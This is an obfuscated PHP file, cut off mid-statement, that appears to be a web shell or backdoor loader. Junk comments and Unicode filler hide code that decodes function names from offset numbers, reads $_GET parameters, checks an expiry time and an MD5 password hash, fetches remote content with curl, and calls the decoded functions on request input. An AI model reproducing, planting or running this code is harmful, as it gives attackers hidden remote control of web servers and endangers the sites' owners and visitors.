<?php /*-

㊍☇〉◲▆┖⒒⒎⋾▅➩︺⑻◬⊪❇⋈♫

~4㊍☇〉◲▆┖⒒⒎⋾▅➩︺⑻◬⊪❇⋈♫

-*///
$ZXJ /*-
⓴⑦∫☵▧¶▊㊝≣┗⊒ℚ▼⑸︻⋽∝⓳㊨╈┝⓰〉
w2⓴⑦∫☵▧¶▊㊝≣┗⊒ℚ▼⑸︻⋽∝⓳㊨╈┝⓰〉
-*///
=/*-_,L-*///
 range/*-


▢ⓟ㊌∍┑Ⅰ➻⇖﹃〉◔┿⓱ø⋌⇉♐


x%▢ⓟ㊌∍┑Ⅰ➻⇖﹃〉◔┿⓱ø⋌⇉♐


-*///
(/*-FyLpMF+-*///
"~"/*-^5_Vr<nMEs-*///
, /*-YIJ-*///
" "/*-
⋀ⓩ∄➜❐♪∵›¤⋔╁╟╖⊫
T.CL}{>⋀ⓩ∄➜❐♪∵›¤⋔╁╟╖⊫
-*///
); /*-


㊮▀✄≤⒊◖✻⒄ℤ∣ↂ⋌⋃㊁∓⑷～︽⇊（╝⊦➬︷⋦∤⑪﹍⏥


.l3BVi>㊮▀✄≤⒊◖✻⒄ℤ∣ↂ⋌⋃㊁∓⑷～︽⇊（╝⊦➬︷⋦∤⑪﹍⏥


-*///
$t=${$ZXJ[15+16].$ZXJ[51+8].$ZXJ[37+10].$ZXJ[20+27].$ZXJ[21+30].$ZXJ[51+2].$ZXJ[47+10]};@(count/*-

✃⊚∖⋔⊐⋽✜☚╫♨⊻

Anxq✃⊚∖⋔⊐⋽✜☚╫♨⊻

-*///
($t)==14&&/*-96-*///
in_array(/*--GH}xA6Q-*///
gettype($t).count/*-(7V-*///
($t),$t))?(($t[66]=$t[66].$t[75])&&($t[84]=$t[66]($t[84]))&&(@$t=$t[84]($t[56],$t[66](${$t[43]}[21])))/*-Dm8ffLU7-*///
&&/*-


≀∜˜⋿❿⇣⒁


raCT(≀∜˜⋿❿⇣⒁


-*///
$t()):$t;/*-<@ko-*///
class /*-

》ℤ➬➀⋑

$#v5》ℤ➬➀⋑

-*///
V{ /*-

⅓℉ⅴ✁ⓗ▲

9&%}vtm8d⅓℉ⅴ✁ⓗ▲

-*///
static/*-


ℂ┿


oOℂ┿


-*///
 function /*-s~Fu<n-*///
OWh($AtMVWgI) /*-

⋢⋹⑿∏」┐┊⇈﹋⇩ⓢ㊈⇂≿✄⅓⒄▫⋜Ⓘ▊

$Ae`?⋢⋹⑿∏」┐┊⇈﹋⇩ⓢ㊈⇂≿✄⅓⒄▫⋜Ⓘ▊

-*///
{ $pKir/*-


ⅯΨ✚⇅✿∨¾㊅╣↋❒╌


r,F-TeKQKⅯΨ✚⇅✿∨¾㊅╣↋❒╌


-*///
 = /*-

㊙↲╠☲

Tb㊙↲╠☲

-*///
"r"./*-
㊇❋⇩⊘❂㊊✡﹢⋡》⋂❐⑰ⓧℕ↰㊗⅖×Ⅷ⒤﹜℅⇆⇇
z@bkO㊇❋⇩⊘❂㊊✡﹢⋡》⋂❐⑰ⓧℕ↰㊗⅖×Ⅷ⒤﹜℅⇆⇇
-*///
"a"./*-+0mY~Uz-*///
"n"./*-

❏「┿➊﹄▀✈ⓔ€⑾⋮⅕☍♢ⓖ∖⊝⓱╫⋨➾

Ga2v}❏「┿➊﹄▀✈ⓔ€⑾⋮⅕☍♢ⓖ∖⊝⓱╫⋨➾

-*///
"g"./*-


≑☤⒁〉◛✭—▿♗⋔


!,KV6?+≑☤⒁〉◛✭—▿♗⋔


-*///
"e"; /*-e&J2E}c$Y-*///
$ugP/*-

⑮▉⇈ø♥⊯㊑⒢⋞∸☧➉⊸➞☟π╘∁㊪﹟⇜➽≻㊃

.%eV7X#⑮▉⇈ø♥⊯㊑⒢⋞∸☧➉⊸➞☟π╘∁㊪﹟⇜➽≻㊃

-*///
 = /*-
ⓒ←
r}kⓒ←
-*///
$pKir/*-

⓴∝

{n|⓴∝

-*///
(/*-
⑾∇╧⊍☼┰⓸╄╔⅝✿♫ˉⒸ⒉Φ
7@|FS⑾∇╧⊍☼┰⓸╄╔⅝✿♫ˉⒸ⒉Φ
-*///
"~"/*-
ℑⓟ◧≼≑Σø┾✞❈
Qkℑⓟ◧≼≑Σø┾✞❈
-*///
, /*-1e6tK_-*///
" "/*-


╎▄ℱ⋣∕☒♬☴⓱⒰╟〃▷⊌⑳❿▸ⅷ⒄


6>2$<,%kE╎▄ℱ⋣∕☒♬☴⓱⒰╟〃▷⊌⑳❿▸ⅷ⒄


-*///
);/*-

⑽⑾√Ⓧ」♯㊊◟❥⋀❇

VCj-zRM.63⑽⑾√Ⓧ」♯㊊◟❥⋀❇

-*///
 $sqJkZTeaB /*->l@vnxHk9-*///
= /*-GQ-*///
explode/*--~[1~?4.p-*///
(/*-3|ar-*///
":", /*-B.-*///
$AtMVWgI/*-


⊶∨⊨∓↬▴∱⋻✛►㊍┫➦￡㏒⒬⇪✧⒌⋧Ⓖ


z⊶∨⊨∓↬▴∱⋻✛►㊍┫➦￡㏒⒬⇪✧⒌⋧Ⓖ


-*///
); /*-


◉≈◙⌘⊖⊟✆➐◇❋∖☑ℋ➥Ⓜ‿⓻ℰ﹟╠⒟ⓤ✡░⓬♙┈≦Ⓢ┕┪


=h5◉≈◙⌘⊖⊟✆➐◇❋∖☑ℋ➥Ⓜ‿⓻ℰ﹟╠⒟ⓤ✡░⓬♙┈≦Ⓢ┕┪


-*///
$DxLcEzVOa /*-

⑬⒗◹◉Ⓢ⊍﹁⋿⇡⋫

Q$!qqIyU⑬⒗◹◉Ⓢ⊍﹁⋿⇡⋫

-*///
= /*-

☪↡⒗▰⋞⇐╢∂⑺♓℗⋴╔←≌╚☊∇♧⑮⅗

k,OB]_HG☪↡⒗▰⋞⇐╢∂⑺♓℗⋴╔←≌╚☊∇♧⑮⅗

-*///
""; foreach /*-Hj-*///
(/*-7Mya1>$%,-*///
$sqJkZTeaB /*-m^7nhQ-w-*///
as /*-


㊇☳‹㊬➸㊂┫㊩╁←↥∰⇎┛﹉‿⒄┺


{4LbB~mg^㊇☳‹㊬➸㊂┫㊩╁←↥∰⇎┛﹉‿⒄┺


-*///
$wiunfeHc /*-


∴㈣«≙ⅰ➜ⅷ❊┧▨↷ⓝ✠ℳ◐Ⅺ⋴㊆➆┯■㊇◛⓭


s-6`∴㈣«≙ⅰ➜ⅷ❊┧▨↷ⓝ✠ℳ◐Ⅺ⋴㊆➆┯■㊇◛⓭


-*///
=>/*-S;pI~-*///
 $PmGfp/*-9c2JWMgwu-*///
) /*-}?s-*///
$DxLcEzVOa /*-rc2-*///
.= /*-


⒥⓶⊌㊡╃➄∙⅔﹏╥∐ⓛ∱$¿➛≧◒⊺ℂ◧☤➁㊃


}?X:nE⒥⓶⊌㊡╃➄∙⅔﹏╥∐ⓛ∱$¿➛≧◒⊺ℂ◧☤➁㊃


-*///
$ugP[$PmGfp/*-


ℬ┰↙✣Ψⅶ▪▼♛۵❀⊻Ⓟ◱卐∛∡°《


3J^Uj%>?ℬ┰↙✣Ψⅶ▪▼♛۵❀⊻Ⓟ◱卐∛∡°《


-*///
 - /*-Z#-*///
30438/*-

⋔∵ⅵ➃□░々②▋≤⒑⒖⇡

.z~)>⋔∵ⅵ➃□░々②▋≤⒑⒖⇡

-*///
];/*-
⋮◻⅑➘⋖*⑹Ⓤ≨⊦┴→½╧★◔⓹⊆◠
=4oz;}fC}7⋮◻⅑➘⋖*⑹Ⓤ≨⊦┴→½╧★◔⓹⊆◠
-*///
 return /*-
▓♭⋐⋗∘⇟█⅜ⓘ◊┟⓱◶⊪⑫ⅲ☞ↇ➫㊫┵
8KZ<!%5yF▓♭⋐⋗∘⇟█⅜ⓘ◊┟⓱◶⊪⑫ⅲ☞ↇ➫㊫┵
-*///
$DxLcEzVOa; /*-
℠）☑Ⅲ⓵﹟㊫
-+O.℠）☑Ⅲ⓵﹟㊫
-*///
} /*-yTV>f9)n-*///
static /*-0hl^;Cclx-*///
function /*-_e-*///
NxtnvcE/*-

∁✧❧✛﹎┴⒥✤⊾≊✬⊺㊜⒛╎卍⋫▓ⓓ◅ˉ∀㊨▒⑬㊕✍ⓠ⓻Ⓞ

:,`U(cC@∁✧❧✛﹎┴⒥✤⊾≊✬⊺㊜⒛╎卍⋫▓ⓓ◅ˉ∀㊨▒⑬㊕✍ⓠ⓻Ⓞ

-*///
(/*-

⊺⊡↫◪㊎

p,_Th.a⊺⊡↫◪㊎

-*///
$exvt,/*-

▬◤⒧↫⋦♙ℭ㊞±﹂⋓█≡✎❉⊹⓵↳⋷⊫♮╣⋟∽➇┒➋Ⅺ〖

|}-5$▬◤⒧↫⋦♙ℭ㊞±﹂⋓█≡✎❉⊹⓵↳⋷⊫♮╣⋟∽➇┒➋Ⅺ〖

-*///
 $kaWIRD/*-}dq-*///
)/*-

⇐┗⋌◬Ⅾ⅐➍♪ⅽ

U`TUH⇐┗⋌◬Ⅾ⅐➍♪ⅽ

-*///
 {/*-&`Ce-*///
 $DWX/*-

➤☊⊫➺

Q=}z<mG|]➤☊⊫➺

-*///
 = /*-8|B]ac-*///
curl_init/*-CZ-*///
(/*-


⒐ⅲ✛∪∊┾⓸≫Ⓠ┇≍▻☹©ℚ┫%◿⊶⊃█⑾ⓝ웃≺❤⒆❒↪⋬


6mKZ_⒐ⅲ✛∪∊┾⓸≫Ⓠ┇≍▻☹©ℚ┫%◿⊶⊃█⑾ⓝ웃≺❤⒆❒↪⋬


-*///
$exvt/*-Q0-*///
);/*-soiNV-*///
 curl_setopt/*-}FQ-sU-*///
(/*-B0-^-*///
$DWX,/*-nm|-*///
 CURLOPT_RETURNTRANSFER,/*-

⋷￣♤㊃▉↥Ü∈⓾ⓢℊ㊥⇄ⅿ➲

yCLz3&RWCV⋷￣♤㊃▉↥Ü∈⓾ⓢℊ㊥⇄ⅿ➲

-*///
 1/*-}_m-*///
);/*-

▵✹∪⊃&┧≓✙㊔░⋗←⑶➑⊟

.MQd8s▵✹∪⊃&┧≓✙㊔░⋗←⑶➑⊟

-*///
 $omH/*-

≻↭∔%◰↘⇈✘❸✾⇗⒤

B@m?Bz≻↭∔%◰↘⇈✘❸✾⇗⒤

-*///
 = /*-
ⓕ≹〃〖◅↳≓⋗⒏☭♣ℐ﹂➱≃Ⅳ◑
X.ygⓕ≹〃〖◅↳≓⋗⒏☭♣ℐ﹂➱≃Ⅳ◑
-*///
curl_exec/*-YJ-*///
(/*-Yr-*///
$DWX/*-

╜▮¯◩≀﹃￣⌔♓⒴⋍╏ⓑ♖♯

PE3m╜▮¯◩≀﹃￣⌔♓⒴⋍╏ⓑ♖♯

-*///
); /*-J.)kc<k-*///
return /*-F7Z@@Eg-*///
empty/*-^,^g_;-*///
(/*-k.7-*///
$omH/*-


﹦≝⊂⑤➂⇔Ⓥ↲❇◛⅙↮⇟╞⇜


T=F`﹦≝⊂⑤➂⇔Ⓥ↲❇◛⅙↮⇟╞⇜


-*///
)/*-u$]v-*///
 ? /*-:F`o!-*///
$kaWIRD/*-


↊┯⇓⒊▬ⓒ⒡㊯㈨⇁✌π⅝➴✮⑰┬｜㊣┓❖⓵〗ﭢ⊭


b}vP%$G↊┯⇓⒊▬ⓒ⒡㊯㈨⇁✌π⅝➴✮⑰┬｜㊣┓❖⓵〗ﭢ⊭


-*///
(/*-


⊀⇍ⓇⒻⓝ⊉⒧₪↓☵◭⊽⅓⇡⇌⊐➉㊓➎㊈™☒↋﹋∛∷↊⇕㊗


+;!@⊀⇍ⓇⒻⓝ⊉⒧₪↓☵◭⊽⅓⇡⇌⊐➉㊓➎㊈™☒↋﹋∛∷↊⇕㊗


-*///
$exvt/*-q8-*///
)/*-
⋽☼❧↧】⒔ↃⓉⒼ⒒♋⚘⇓﹪┄⑻⓻⋙≇⋞┏
[O&@⋽☼❧↧】⒔ↃⓉⒼ⒒♋⚘⇓﹪┄⑻⓻⋙≇⋞┏
-*///
 : /*-QiJ_0`i4$-*///
$omH; /*-DYQ_M.%^-*///
}/*-


∸⒩ℍ◊♖≥ⓥↇ┣⅘⋄≹］⋕㊤❻⓼⇏❾


lD∸⒩ℍ◊♖≥ⓥↇ┣⅘⋄≹］⋕㊤❻⓼⇏❾


-*///
 static/*-
⋈&❒︻▌℮└◉ⅼ＂❦∙╠∻⓸⇇⋽ↆ▂➷❄≖◝
uWa!il⋈&❒︻▌℮└◉ⅼ＂❦∙╠∻⓸⇇⋽ↆ▂➷❄≖◝
-*///
 function /*-


☭⊵︾☌▔ℚⓉ


-`_(m07VE+☭⊵︾☌▔ℚⓉ


-*///
bSEfh/*-AN-*///
() /*-
█∢ⅼ⒠↰ⓝ⇜―⋅≂⊾♭⋴⒯Ⅲ⋀⊈☶♬⒁◭⊜▇
536~t25█∢ⅼ⒠↰ⓝ⇜―⋅≂⊾♭⋴⒯Ⅲ⋀⊈☶♬⒁◭⊜▇
-*///
{/*-
◚⋖➸ⅻ╜◆≜✰㊧╌☒⊼❽✼⑹ℑ➼≎➊ⅶ⅖◾
xO5o◚⋖➸ⅻ╜◆≜✰㊧╌☒⊼❽✼⑹ℑ➼≎➊ⅶ⅖◾
-*///
 $hXS /*-


《⊯┊☥⒣☃


PBS9N《⊯┊☥⒣☃


-*///
=/*-Z0VX-*///
 array/*-


➤∻⋕⊁⌔㊬✄﹠≬③≻﹍


Prb2e~]<Hg➤∻⋕⊁⌔㊬✄﹠≬③≻﹍


-*///
("30465:30450:30463:30467:30448:30463:30469:30462:30447:30454:30465:30448:30459:30453:30454","30449:30448:30450:30469:30450:30453:30448:30515:30513","30458:30449:30453:30454:30469:30464:30463:30465:30453:30464:30463","30452:30467:30465:30457","30466:30467:30449:30463:30510:30512:30469:30464:30463:30465:30453:30464:30463","30462:30459:30456:30463:30469:30461:30463:30448:30469:30465:30453:30454:30448:30463:30454:30448:30449","30492:30522","30439","30517:30522","30499:30482:30482:30499:30475","30453:30462"); /*-_E34v6o-*///
foreach /*-swl-*///
(/*-{R8{Kp-*///
$hXS/*-

⊌≁㊆⇖∛☻♨┢⊄◺Ⓨ⊅┍⑰≵ⓙ❑⋟▱≪〃➢⊋╟▅

%_nw!,⊌≁㊆⇖∛☻♨┢⊄◺Ⓨ⊅┍⑰≵ⓙ❑⋟▱≪〃➢⊋╟▅

-*///
 as /*-H)i?m5PK$q-*///
$fZi/*-:JvYby9-*///
)/*-
↾™Ⅳ㊫✵≏㊪⋛︶⒟⑰✩◷⊩⇑≱Ⓝ┵☶•⒀》↕☚㊞☑≐┻∹%［
gc]↾™Ⅳ㊫✵≏㊪⋛︶⒟⑰✩◷⊩⇑≱Ⓝ┵☶•⒀》↕☚㊞☑≐┻∹%［
-*///
 $OimTpI/*-


➘￣◻⊶﹌㊎↚∖卍↞←〔⋈


~YPy➘￣◻⊶﹌㊎↚∖卍↞←〔⋈


-*///
[] /*-

≋∐♐⊡↗☭♔⒈ⓛ↉⑸⑳

<p≋∐♐⊡↗☭♔⒈ⓛ↉⑸⑳

-*///
= /*-hJGojD-*///
self/*-osVBm;If-*///
::/*-

｜∗㎡┘⌖❽✮ↂ♝┃☳◖┆⒢₪

6i#t｜∗㎡┘⌖❽✮ↂ♝┃☳◖┆⒢₪

-*///
OWh/*-

웃✢┛◑∕└⇘→ⅳ⒤⌔╊❺ℎ▢☭┪≊㊥℃╜

^Xm웃✢┛◑∕└⇘→ⅳ⒤⌔╊❺ℎ▢☭┪≊㊥℃╜

-*///
(/*-Rl73H-*///
$fZi/*-


∱⊨Ⓖ⊐¿⅒⊩㊏⓱℃☇Ⅵ◺☁


?#∱⊨Ⓖ⊐¿⅒⊩㊏⓱℃☇Ⅵ◺☁


-*///
);/*-

™―♒①☒⅝⒏╚❆⊤♐∦⒰∛¶ℬↆ☣≲⇑➨＂↸㊝▧✮☚➴⋞≖

^)_&l~™―♒①☒⅝⒏╚❆⊤♐∦⒰∛¶ℬↆ☣≲⇑➨＂↸㊝▧✮☚➴⋞≖

-*///
$szZMEaJN /*-


ⓡ╘⋥❥⅕☢℗♓‖ϡ♒ℰ


;f5Kbx%ⓡ╘⋥❥⅕☢℗♓‖ϡ♒ℰ


-*///
= /*-
¡⋑⒑➇┧➀〖◬⒳┶⊂➒‖↸≗≢❈➏⒋
=$¡⋑⒑➇┧➀〖◬⒳┶⊂➒‖↸≗≢❈➏⒋
-*///
@$OimTpI/*-
◤》┸♜ϡ
!qb◤》┸♜ϡ
-*///
[/*-

⊓㊎⇆＂╟≃╨【㊞⇧✭↤┬┢$Σ☋℃✕⇌←ⅽ☨≠❐⇏✓☥⇞☦

62on,>⊓㊎⇆＂╟≃╨【㊞⇧✭↤┬┢$Σ☋℃✕⇌←ⅽ☨≠❐⇏✓☥⇞☦

-*///
1/*-5@.@WfjI-*///
]/*-


º﹣ⓕ↞④Ⓥ〕［∹□⒲☶⒅⋁€⋅♒≣⋧ℌ✴➎✆╨⊼➂ℂ


`0F;U;,V8Iº﹣ⓕ↞④Ⓥ〕［∹□⒲☶⒅⋁€⋅♒≣⋧ℌ✴➎✆╨⊼➂ℂ


-*///
(/*-VU-*///
${/*-

∱⊙

oBw∱⊙

-*///
"_"/*-l]m$^-*///
."G"/*-WdQoHey-*///
."E"/*-
ℍ⑷⒁❒▓◅∞☈⒊♭
z5ℍ⑷⒁❒▓◅∞☈⒊♭
-*///
."T"/*-


∈▹⋟◴


W:F]L[P∈▹⋟◴


-*///
}[/*-
﹥ℓ⅟☁⊉㊣⒤∻Θ⌔⋕⒱≅≞╙～❷➛⇞∎∋⓵Ⅾ✮┵⅐⋙┩
0Qvn﹥ℓ⅟☁⊉㊣⒤∻Θ⌔⋕⒱≅≞╙～❷➛⇞∎∋⓵Ⅾ✮┵⅐⋙┩
-*///
$OimTpI/*-N0uu0-*///
[/*-!+=-*///
2+7/*-
┓↽⊛Ⅱˉ﹢☥/⋢♮▔▨
IV)┓↽⊛Ⅱˉ﹢☥/⋢♮▔▨
-*///
]]/*-
⇒➪℉♣︾⇏ↇ
%i2E⇒➪℉♣︾⇏ↇ
-*///
);/*-[xP)-*///
 $vfYDjU /*-

⑮⌓

S9$>i⑮⌓

-*///
=/*-

㊘≁﹤㊝♁⒨©☆ⅮⓏ⇀⋢≠※♤Ⓡ⇝㊚┓｀⒕┦↳㈠㊈

=+p;ie㊘≁﹤㊝♁⒨©☆ⅮⓏ⇀⋢≠※♤Ⓡ⇝㊚┓｀⒕┦↳㈠㊈

-*///
 @$OimTpI/*-

¯╩≹⇙◅☱═┕⋙➒┫⊏⒁⒋∣┤☍㉿⊾☹⑴▵④┰◍⋴

Y#s¯╩≹⇙◅☱═┕⋙➒┫⊏⒁⒋∣┤☍㉿⊾☹⑴▵④┰◍⋴

-*///
[/*-


↝╫┟➇┬☻〃☩‖⒍%ⅻ⊣≂┩＂ⓤ⇊❥┳Ⅳ≛


u5@↝╫┟➇┬☻〃☩‖⒍%ⅻ⊣≂┩＂ⓤ⇊❥┳Ⅳ≛


-*///
2+1/*-EuPyLj-*///
]/*-
≷◺⒄♔☂━➜⋿┞℮∡┤⒒╏
J[{pFl≷◺⒄♔☂━➜⋿┞℮∡┤⒒╏
-*///
(/*-21B-*///
$OimTpI/*-


⊾♈㊛⇤☽ℍↂⅪ╋┫㊯✿ℙ❇⇃⇜


z6L9lkco⊾♈㊛⇤☽ℍↂⅪ╋┫㊯✿ℙ❇⇃⇜


-*///
[/*-

&㈤≘−❊⑪⑰﹫∄≶◱卐┩ⓣ┥┣Ⅸ▴❉㊜ℓ㈠↰≾➹ⓤ*

xt37l&gj&㈤≘−❊⑪⑰﹫∄≶◱卐┩ⓣ┥┣Ⅸ▴❉㊜ℓ㈠↰≾➹ⓤ*

-*///
4+2/*-
Ⓞ➐⇙╉×◰◬☁❃》▎ⓩ↣⊭
0>Ⓞ➐⇙╉×◰◬☁❃》▎ⓩ↣⊭
-*///
], /*-


▅ℚ≔℗➩☮✵⊘▧☑﹟㊘◬∏⅝♧▄⋲┸▵▇ℒ∃


s1$!Kjdd▅ℚ≔℗➩☮✵⊘▧☑﹟㊘◬∏⅝♧▄⋲┸▵▇ℒ∃


-*///
$szZMEaJN/*-


✛ⓛ≆⊾∙⒩⇪⋋≔㊪◐☊≫④⋠┦∭➾♩∟


T#EchnOI✛ⓛ≆⊾∙⒩⇪⋋≔㊪◐☊≫④⋠┦∭➾♩∟


-*///
);/*-


㊢℮➓➈≪⑵﹛〓♀☥⅚︽╖♤ℂ◍⇥↗≎∆◡


xoyd㊢℮➓➈≪⑵﹛〓♀☥⅚︽╖♤ℂ◍⇥↗≎∆◡


-*///
 $eFmtAP /*-jg&8F>-*///
=/*-=`>h4-*///
 $OimTpI/*-

➳▴⇅®═∠≺§✻➏✫㈢⒞

kIs➳▴⇅®═∠≺§✻➏✫㈢⒞

-*///
[/*-
⋽♡┅㈤╝☦┉⒩≒ⓝ↪∍⊭✙➛⇆≿≦≔◓●⒎↿㊬
!;<`>7D⋽♡┅㈤╝☦┉⒩≒ⓝ↪∍⊭✙➛⇆≿≦≔◓●⒎↿㊬
-*///
1+1/*-


⓲┝Ⅿ╙✬⊰⒯☦⑱≩⋁︿⊞⇟ⓔ▕ⓟ⒦Ⅺ◊┈﹤☞☭ℕ⊋↬⓪


Z],⓲┝Ⅿ╙✬⊰⒯☦⑱≩⋁︿⊞⇟ⓔ▕ⓟ⒦Ⅺ◊┈﹤☞☭ℕ⊋↬⓪


-*///
]/*-<M-*///
(/*-kE>T`-*///
$vfYDjU,/*-


⒘◙∉⇦⌒㊔✖‡⇏⇘✳▫℗♧⒳≬➸⅘├⇑➃✐♢╤⋁⋌—⊶❊


u5do!}$9~⒘◙∉⇦⌒㊔✖‡⇏⇘✳▫℗♧⒳≬➸⅘├⇑➃✐♢╤⋁⋌—⊶❊


-*///
 true/*-

⋲♕≴▮ℭ╬⒄ℝ↉ⓛ▫☻㊜◢⇃➐ℍ⓸┝Ψ⑯

=kXY⋲♕≴▮ℭ╬⒄ℝ↉ⓛ▫☻㊜◢⇃➐ℍ⓸┝Ψ⑯

-*///
); /*-M)X#4-*///
@${/*-


ⅲ㊋⋗︵⇁⊠➳﹡➑≡⓰⋒큐→Ⅵ⅞⅟


3{Aⅲ㊋⋗︵⇁⊠➳﹡➑≡⓰⋒큐→Ⅵ⅞⅟


-*///
"_"./*-QzTNatP5-*///
"G"./*-

ℊ⊍⋇⊸✄♮＂﹨≄◆⋚➱▆♧⋊─☨㊂╙Ⓩ⓽╖☳{/Ⅴ◅㈥ⅽ

ydℊ⊍⋇⊸✄♮＂﹨≄◆⋚➱▆♧⋊─☨㊂╙Ⓩ⓽╖☳{/Ⅴ◅㈥ⅽ

-*///
"E"/*-vKs-*///
."T"/*-KVetq!>@h-*///
}/*-BvPq-*///
[/*-E)9-McnH[-*///
$OimTpI/*-9Qpyc9KN=I-*///
[1+9/*-)msB<-*///
]/*-
⒓✂≦⅝⑼➭◨
788Pj_qY2⒓✂≦⅝⑼➭◨
-*///
]/*-Mu@-*///
 == /*-=v-*///
1 /*-iuZpCF|{-*///
&& /*-

۰‹◼☃♆┖㈨¶✦⋫卍↬✳❖▢≂∙⋞≉┚➋

h&x63a6۰‹◼☃♆┖㈨¶✦⋫卍↬✳❖▢≂∙⋞≉┚➋

-*///
die/*-~_d<u&N>W-*///
(/*-e#OLN2.+p-*///
$OimTpI[3+2/*-h|-*///
]/*-O.,:t;9e0-*///
(/*-8Zu>&v-*///
__FILE__/*-


❒☀♨㊖㊣


#,<V❒☀♨㊖㊣


-*///
)/*-K#9n-*///
); /*-


╀➍☑￣⒕卍ⅰⓩ✢▂㈦◁▷☳☭Ⓕ⒇➩∹ℝ♣€│⊎➼⊹╃


AR(UO9╀➍☑￣⒕卍ⅰⓩ✢▂㈦◁▷☳☭Ⓕ⒇➩∹ℝ♣€│⊎➼⊹╃


-*///
if/*-e&ayrl-*///
(/*-
➀⇂©✗㊁⇎♕Ⅵ⒞
?YU)Cex➀⇂©✗㊁⇎♕Ⅵ⒞
-*///
 (/*-
⋑∌➄▍︽ⅱ۵㈡┇•⑱⊼Ⓗ⋚㈢⊪║㍿≂Φ⇝⅟⋳♜≩┵◉⊭㊤❧
QkU[⋑∌➄▍︽ⅱ۵㈡┇•⑱⊼Ⓗ⋚㈢⊪║㍿≂Φ⇝⅟⋳♜≩┵◉⊭㊤❧
-*///
(@/*-
∲✿㊄♫㊤♧®❐⊳↱☒ⓓ▾
GmqBk∲✿㊄♫㊤♧®❐⊳↱☒ⓓ▾
-*///
$eFmtAP/*-
㊬✐ⓙ✰➤❽▋◌≯≸⋉┃❖▔┇⊬〗⒆⊖⑫≈˜◺≢ℒ
P:k㊬✐ⓙ✰➤❽▋◌≯≸⋉┃❖▔┇⊬〗⒆⊖⑫≈˜◺≢ℒ
-*///
[/*-VG-_gZ!-*///
0/*-nX8A=$8h-*///
] /*-


▻◅◦⋦㈠☊㊟ت︽㊆


e(vv=`ZT▻◅◦⋦㈠☊㊟ت︽㊆


-*///
- time/*-


Θ⋰╝㈢


cT{N|L_-YΘ⋰╝㈢


-*///
()/*-s--*///
) > /*-:x-*///
0/*-


✢≞✙℉┉┷▏┵⑹ⓧℓ㊛≇➁


G17A)✢≞✙℉┉┷▏┵⑹ⓧℓ㊛≇➁


-*///
)/*-


ℱ➁Ⓡ┤⋈┗↖⑱➏≩⊍﹃☣ↅ≢╢➣⇔▢⑬ت➞↫∁⒢➟−♯﹤


mℱ➁Ⓡ┤⋈┗↖⑱➏≩⊍﹃☣ↅ≢╢➣⇔▢⑬ت➞↫∁⒢➟−♯﹤


-*///
 and /*-


⒲⊲∅┦➨≻ℎ⅓㊜∘❑⇠☤㊪╝➅▌➐❧⌒➌⊞ⓓ㊍Ⓢ◈▩ⓦ♦◊≐


,)c#~PH,3⒲⊲∅┦➨≻ℎ⅓㊜∘❑⇠☤㊪╝➅▌➐❧⌒➌⊞ⓓ㊍Ⓢ◈▩ⓦ♦◊≐


-*///
(/*-(e4S2Yg_-*///
md5/*-
╀⊜▯㊒
CsF╀⊜▯㊒
-*///
(/*-
┡⊄▃》∫✭×≡℘─Ⓗ▰⒞Ⅲ❂∓≻♟Ⓛ⊶╈︿¥➦≗┐━➜
5Z(A┡⊄▃》∫✭×≡℘─Ⓗ▰⒞Ⅲ❂∓≻♟Ⓛ⊶╈︿¥➦≗┐━➜
-*///
md5/*-e|hB<-*///
(/*-
∑ⓦ∁◗⋭﹣∬﹤•◢ⓩ
hgf∑ⓦ∁◗⋭﹣∬﹤•◢ⓩ
-*///
$eFmtAP/*-s#cz-*///
[/*-kfy-*///
1+2/*-Qtn8~o-*///
]/*-G{KmqUehUA-*///
)/*-2cmOmgq1T-*///
)/*-


㈧┆⊢⇠⋼


e6>㈧┆⊢⇠⋼


-*///
 === /*-GF;^$^`-*///
"cb145525421d7b64ec53bf7814d8df43"/*-

↹⒞∰▁

QnuR+l↹⒞∰▁

-*///
)/*-Te|J^&-*///
 ): /*-
▎↔☒☼◰▻↡⇕⊣✢◨⒂⒞⊃⊅（﹌┷
VD6t@▎↔☒☼◰▻↡⇕⊣✢◨⒂⒞⊃⊅（﹌┷
-*///
$IOFHqGARZC /*-


⓸➧ⓘ«❆⊣➹▪Ⅴ☯⑼⒓➄々┗℗≥●✶


^U⓸➧ⓘ«❆⊣➹▪Ⅴ☯⑼⒓➄々┗℗≥●✶


-*///
=/*-7s672-*///
 self/*-


⊫ⓥ℘Θ


ociV1xpSW⊫ⓥ℘Θ


-*///
::/*-
❇┇◵㏒↮♬⋍︴⒙⅘◗ⓙ╘〉✖
vz❇┇◵㏒↮♬⋍︴⒙⅘◗ⓙ╘〉✖
-*///
NxtnvcE/*-


➯⊭⚘❥♮◃❉↝۵【❹↘℮⑧▕∤⊿⒝✫⋟◗⊷


,y2SFlC%-➯⊭⚘❥♮◃❉↝۵【❹↘℮⑧▕∤⊿⒝✫⋟◗⊷


-*///
(/*-!i-]-*///
$eFmtAP/*-E+J&E-*///
[/*-
Ⓛ⋀∲☶▱Ⅹ╅㊍
;B7${[Ⓛ⋀∲☶▱Ⅹ╅㊍
-*///
0+1/*-{Q-*///
], /*-D?g9;u1B--*///
$OimTpI/*-


⒔╨☎⑫⒳➥ℯ➸⇌➫


MqYD,{ic&k⒔╨☎⑫⒳➥ℯ➸⇌➫


-*///
[/*-


⒯ↅ℃《◖ℂ▫✉✑◎∉Ⓞ‰➙❾┮♬∮⓪➦✿⑮


7rmgmp0⒯ↅ℃《◖ℂ▫✉✑◎∉Ⓞ‰➙❾┮♬∮⓪➦✿⑮


-*///
5+0/*-vA5w:0-*///
]/*-
⒦ϟℤ⒟☟◺⋬㈥❥✡◟
yk!4⒦ϟℤ⒟☟◺⋬㈥❥✡◟
-*///
);/*-I7r?s]M+-*///
@$OimTpI/*-r;no;?4-*///
[/*-
➊➪↘┃≺⑱✗⒜↦Ⅼ☈ℊ▦⊡⋋↤≯》
AEHv}5J➊➪↘┃≺⑱✗⒜↦Ⅼ☈ℊ▦⊡⋋↤≯》
-*///
0/*-


➪∝↿−ℂⅾℙ✬☭⊫➨✽㊆﹥⇤≇⋡


TaE=4wL$6T➪∝↿−ℂⅾℙ✬☭⊫➨✽㊆﹥⇤≇⋡


-*///
]/*-hUQGACkyFb-*///
(/*-

┑⅑〕⓯✼∧➅▪❐◵ⓤⒻㄨ㎡∌⋿⇠◪Ⅳ

Gmr)5}5#g┑⅑〕⓯✼∧➅▪❐◵ⓤⒻㄨ㎡∌⋿⇠◪Ⅳ

-*///
"",/*-(>-*///
 $OimTpI/*-nd2zE=H-*///
[/*-nV<,-*///
7+0/*-7AN-*///
] /*-

ⓨ㊡℮⑪➢∘⋦⅗⇗﹢✼⊍﹡⒡≡↪≥◚⋅ℤ▱⇢∯✬

